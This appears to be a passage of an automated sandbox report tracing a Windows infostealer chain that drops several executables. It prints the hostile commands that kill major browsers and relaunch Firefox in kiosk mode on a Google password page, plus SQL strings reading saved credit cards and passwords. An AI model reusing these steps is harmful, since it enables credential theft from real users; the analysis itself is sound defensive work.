Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 9_2_00E40228 9_2_00E40228
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 9_2_00E7A0D0 9_2_00E7A0D0
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 9_2_00E6E8A0 9_2_00E6E8A0
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 9_2_00E3A850 9_2_00E3A850
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 9_2_00E42030 9_2_00E42030
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 9_2_00E3E1A0 9_2_00E3E1A0
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 9_2_00E35160 9_2_00E35160
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 9_2_00E74A40 9_2_00E74A40
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 9_2_00E3A300 9_2_00E3A300
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 9_2_00E5CCD0 9_2_00E5CCD0
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 9_2_00E37CA4 9_2_00E37CA4
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 9_2_00E44487 9_2_00E44487
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 9_2_00E4049B 9_2_00E4049B
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 9_2_00E5C470 9_2_00E5C470
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 9_2_00E4C5F0 9_2_00E4C5F0
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 9_2_00E335B0 9_2_00E335B0
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 9_2_00E38590 9_2_00E38590
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 9_2_00E5FD10 9_2_00E5FD10
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 9_2_00E3BEB0 9_2_00E3BEB0
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 9_2_00E46EBF 9_2_00E46EBF
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 9_2_00E3AF10 9_2_00E3AF10
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F68060 12_2_00F68060
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FD2046 12_2_00FD2046
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FC8298 12_2_00FC8298
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F9E4FF 12_2_00F9E4FF
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F9676B 12_2_00F9676B
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FF4873 12_2_00FF4873
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F6CAF0 12_2_00F6CAF0
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F8CAA0 12_2_00F8CAA0
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F7CC39 12_2_00F7CC39
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F96DD9 12_2_00F96DD9
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F691C0 12_2_00F691C0
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F7B119 12_2_00F7B119
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F81394 12_2_00F81394
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F8781B 12_2_00F8781B
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F7997D 12_2_00F7997D
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F67920 12_2_00F67920
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F87A4A 12_2_00F87A4A
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FB3CE7 12_2_00FB3CE7
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F87CA7 12_2_00F87CA7
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F99EEE 12_2_00F99EEE
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FEBE44 12_2_00FEBE44
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\num[1].exe 27E4A3627D7DF2B22189DD4BEBC559AE1986D49A8F4E35980B428FADB66CF23D
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: String function: 00F7F9F2 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: String function: 00F69CB3 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: String function: 00F80A30 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: String function: 00E4D300 appears 47 times
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9994907693894389
Source: OLR88CERN7VQFRQ38J.exe.0.dr Static PE information: Section: ZLIB complexity 0.9982597496594006
Source: OLR88CERN7VQFRQ38J.exe.0.dr Static PE information: Section: toioyzgt ZLIB complexity 0.9943542843341261
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe.0.dr Static PE information: Section: iadgvtjq ZLIB complexity 0.9950858969713152
Source: skotes.exe.3.dr Static PE information: Section: ZLIB complexity 0.9982597496594006
Source: skotes.exe.3.dr Static PE information: Section: toioyzgt ZLIB complexity 0.9943542843341261
Source: random[1].exe.5.dr Static PE information: Section: ZLIB complexity 0.9994907693894389
Source: aae25c676b.exe.5.dr Static PE information: Section: ZLIB complexity 0.9994907693894389
Source: random[1].exe0.5.dr Static PE information: Section: iadgvtjq ZLIB complexity 0.9950858969713152
Source: 7d61336cf8.exe.5.dr Static PE information: Section: iadgvtjq ZLIB complexity 0.9950858969713152
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe, 00000004.00000003.2404591407.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, ENORVNMU067PBMHUGECCERYC06W3ZY.exe, 00000004.00000002.2492114993.00000000004D1000.00000040.00000001.01000000.00000009.sdmp, 7d61336cf8.exe, 0000000A.00000003.2591227334.00000000053C0000.00000004.00001000.00020000.00000000.sdmp, 7d61336cf8.exe, 0000000A.00000002.2634884064.0000000000A21000.00000040.00000001.01000000.00000010.sdmp Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@72/24@92/12
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FD37B5 GetLastError,FormatMessageW, 12_2_00FD37B5
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FC10BF AdjustTokenPrivileges,CloseHandle, 12_2_00FC10BF
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FC16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 12_2_00FC16C3
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FD51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 12_2_00FD51CD
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FCD4DC CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 12_2_00FCD4DC
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FD648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize, 12_2_00FD648E
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F642A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 12_2_00F642A2
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Code function: 6_2_053215D0 ChangeServiceConfigA, 6_2_053215D0
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\L7HXZM5O.htm Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1220:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5576:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:352:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5984:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6920:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3876:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5836:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:592:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5072:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7148:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe, 00000004.00000002.2493072660.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards;#
Source: file.exe, 00000000.00000003.2190951633.00000000055D2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2202725554.00000000055D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2191335094.00000000055B4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2202863255.00000000055C4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2191554047.00000000055A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: firefox.exe, 0000001A.00000003.2782230849.000002EE653CD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2936846123.000002EE653CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: UPDATE moz_places SET foreign_count = foreign_count + 1 WHERE id = NEW.place_id;
Source: file.exe ReversingLabs: Detection: 39%
Source: OLR88CERN7VQFRQ38J.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: BF3BS0M5707K28RGW9.exe String found in binary or memory: 3The file %s is missing. Please, re-install this application
Source: 7d61336cf8.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe "C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe "C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe"
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe "C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe "C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe "C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe "C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe"
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe "C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe"
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000995001\num.exe "C:\Users\user\AppData\Local\Temp\1000995001\num.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2268 -parentBuildID 20230927232528 -prefsHandle 2196 -prefMapHandle 2184 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3c1d5462-c346-494a-a215-38ac926e40ed} 5900 "\\.\pipe\gecko-crash-server-pipe.5900" 2ee4c96f510 socket
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3744 -parentBuildID 20230927232528 -prefsHandle 3908 -prefMapHandle 3644 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4e609914-25f3-44db-b997-bef2d2c17579} 5900 "\\.\pipe\gecko-crash-server-pipe.5900" 2ee5ee46610 rdd
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe "C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe "C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe"
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000995001\num.exe "C:\Users\user\AppData\Local\Temp\1000995001\num.exe"
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2336 -parentBuildID 20230927232528 -prefsHandle 2272 -prefMapHandle 2264 -prefsLen 25307 -prefMapSize 239752 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e7c1ee17-f254-4518-bacd-57c97958ed1d} 4992 "\\.\pipe\gecko-crash-server-pipe.4992" 1c6f5e6ff10 socket
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe "C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe "C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe "C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe "C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe "C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe "C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000995001\num.exe "C:\Users\user\AppData\Local\Temp\1000995001\num.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2268 -parentBuildID 20230927232528 -prefsHandle 2196 -prefMapHandle 2184 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3c1d5462-c346-494a-a215-38ac926e40ed} 5900 "\\.\pipe\gecko-crash-server-pipe.5900" 2ee4c96f510 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3744 -parentBuildID 20230927232528 -prefsHandle 3908 -prefMapHandle 3644 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4e609914-25f3-44db-b997-bef2d2c17579} 5900 "\\.\pipe\gecko-crash-server-pipe.5900" 2ee5ee46610 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
